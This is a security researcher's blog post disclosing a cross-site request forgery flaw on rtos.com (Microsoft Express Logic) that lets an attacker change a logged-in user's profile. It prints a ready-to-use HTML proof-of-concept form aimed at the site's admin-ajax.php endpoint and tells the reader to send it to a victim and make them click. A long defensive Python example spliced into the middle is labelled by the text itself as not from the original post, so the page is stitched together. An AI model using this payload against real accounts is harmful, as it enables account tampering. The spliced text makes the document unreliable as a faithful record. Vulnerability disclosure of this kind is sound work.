Cross Site Request Forgery vulnerability Leads to User Profile Change in Microsoft Express Logic

Adesh Kolte
Jan 21 · 2 min read

Basic Cross Site Request Forgery

CSRF (Cross-Site Request Forgery) is a vulnerability that tricks a logged-in user's browser into submitting a request the attacker chose, which works whenever the site's forms carry no anti-CSRF token. When tokens are implemented, your website https://example.com includes a randomly generated token in every page it serves, and that token is impossible for the attacker to guess. It differs each time any page is served to anybody, so the attacker cannot build a valid request: the request would carry the wrong token.
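The check the paragraph describes, written out as an added example that is not code from the original post or from the affected site: the server stores one random token per session, embeds it in its own form as a hidden field, and refuses any profile update whose submitted token does not match. The in-memory session store, the `/account` endpoint and the field names are constructed for the example; a real application would use its framework's server-side session.

```python
import hmac
import secrets
from urllib.parse import parse_qs

# Constructed in-memory session store; a real application would use its
# server-side session (assumption: one CSRF token per session).
SESSIONS = {}


def new_session(first_name="alice"):
    """Create a logged-in session with a fresh, unguessable CSRF token."""
    sid = secrets.token_urlsafe(16)
    SESSIONS[sid] = {
        "csrf_token": secrets.token_urlsafe(32),
        "profile": {"first_name": first_name},
    }
    return sid


def render_profile_form(sid):
    """Embed the session's token as a hidden field in the legitimate form.
    A page on another origin cannot read this value, so it cannot reproduce it."""
    token = SESSIONS[sid]["csrf_token"]
    return (
        '<form action="/account" method="POST">'
        f'<input type="hidden" name="csrf_token" value="{token}" />'
        '<input type="text" name="first_name" />'
        '<input type="submit" value="Save" />'
        "</form>"
    )


def handle_profile_post(sid, body):
    """Server-side handler for the profile update; returns (status, message).

    The update is applied only when the submitted csrf_token matches the one
    stored for the session. hmac.compare_digest keeps the comparison
    constant-time; both sides are encoded so non-ASCII input cannot raise.
    """
    params = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    supplied = params.pop("csrf_token", "")
    expected = SESSIONS[sid]["csrf_token"]
    if not hmac.compare_digest(supplied.encode(), expected.encode()):
        return 403, "CSRF token missing or invalid"
    SESSIONS[sid]["profile"].update(params)
    return 200, "profile updated"


if __name__ == "__main__":
    sid = new_session()
    # A form hosted elsewhere can reproduce the field names but not the token.
    print(handle_profile_post(sid, "first_name=attacker"))
    # -> (403, 'CSRF token missing or invalid')
    # The site's own form carries the token and is accepted.
    token = SESSIONS[sid]["csrf_token"]
    print(handle_profile_post(sid, f"csrf_token={token}&first_name=bob"))
    # -> (200, 'profile updated')
```

The token is tied to the session, so a token captured from one session is useless against another, and the 403 path leaves the stored profile untouched. In practice this check is combined with the `SameSite` cookie attribute and an `Origin`/`Referer` check as defence in depth, and a WordPress AJAX handler such as the one targeted below would get the same protection from its nonce check.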

Affected Product: https://rtos.com

Allows an attacker to change a victim's account information, in this case the "Name" field. The attacker can change the information without logging in to the victim's account, purely by using the CSRF technique. All of the victim user's profile information can be changed this way: company name, position, phone number, website, country and postal address.

Using the script below:

<html>
<!-- CSRF PoC -->
<body>
<script>CSRF</script>
<form action="https://rtos.com/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="first&#95;name" value=" attacker " />
<input type="hidden" name="last&#95;name" value=" attacker " />
<input type="hidden" name="company" value="attacker" />
<input type="hidden" name="position" value="Co&#45;f attacker r" />
<input type="hidden" name="phone" value="123324123" />
<input type="hidden" name="website" value="http&#58;&#47;&#47;adeshkolte&#46;com" />
<input type="hidden" name="country" value="IN" />
<input type="hidden" name="address" value="Pune&#32;" />
<input type="hidden" name="address2" value="Pune" />
<input type="hidden" name="city" value="Pune&#32;" />
<input type="hidden" name="state" value="" />
<input type="hidden" name="region" value="Maharashtra&#32;" />
<input type="hidden" name="zip" value="443112" />
<input type="hidden" name="action" value="account&#95;personal" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

Save it as csrf.html, send the script to the victim and make them click.

Got a Hall of Fame listing: https://portal.msrc.microsoft.com/en-us/security-guidance/researcher-acknowledgments-online-services?rtc=1

Thanks For Reading

Written by Adesh Kolte

Listed in the top 100 most respected hackers in the world by Microsoft at the BlackHat conference in America, 2018.
